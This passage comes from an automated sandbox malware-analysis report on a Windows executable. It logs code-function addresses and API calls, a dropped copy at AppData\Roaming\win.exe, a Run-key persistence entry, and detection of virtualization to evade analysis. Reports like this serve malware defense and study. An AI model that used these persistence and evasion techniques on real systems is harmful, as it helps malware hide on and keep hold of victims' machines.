            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5F4C push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1A18 push esp; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0A20 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1A68 push esp; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0A62 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8A62 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3A72 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A829A push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0AC8 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A92D4 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8AFA push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1AF4 push esp; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0B1C push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A7B2A push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B22 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2B26 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4326 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9332 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6336 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A834E push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1B44 push esp; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6B5A push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile created: C:\Users\user\AppData\Roaming\win.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run winJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run winJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\win.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0BF8 NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A86C3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0703 EnumWindows,NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1210 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1259 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2A5D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2A50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1286 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A12A4 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2AC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A12E0 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2AF4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A131B TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1331 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2B34
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1348 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A135C TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2B84
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A13B4 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2BD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A13EC TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A101C TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4834 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1078 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4880 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A109C TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4907 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1124 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A113F TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1163 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4970 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A49FC NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0E24 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A463C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0E70 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4698 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A46E0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0F04 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8726 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A473C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0F50 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0F74 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0FB8 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A47DA NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1402 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1421 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2C24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1430 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0C4C TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1C7E NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2C8C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1484 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0CEC TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2CE0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A44FF NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0D40 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4554 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8DBB NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0DB4 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0DE4 TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A45F2 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560BF8 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005686C3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561078
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056101C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564834
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056109C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564880
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564970
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561163
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564907
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056113F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561124
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005649FC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562A50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562A5D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561259
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562AC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562AF4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005612E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005612A4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056135C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056131B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562B34
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562BD4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005613EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562B84
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005613B4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560C4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561C7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561430
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562C24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005644FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562CE0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560CEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561484
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562C8C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564554
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560D40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005645F2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560DE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056158E NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560DB4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005615BC NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568DBB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561670 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560E70
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561604 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056463C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560E24
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005646E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564698
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560F50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560F74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560F04
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056473C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568726
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005647DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560FB8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0BF8 NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F86C3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0703 EnumWindows,NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1210 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2A5D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1259 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2A50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1286 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F12A4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2AC0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2AF4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F12E0 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F131B TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2B34
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1331 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F135C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1348 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2B84
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F13B4 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2BD4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F13EC TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F101C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4834 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1078 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F109C TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4880 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4907 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F113F TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1124 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4970 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1163 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F49FC NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F463C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0E24 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0E70 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4698 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F46E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0F04 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F473C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8726 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0F50 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0F74 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0FB8 TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F47DA NtWriteVirtualMemory,
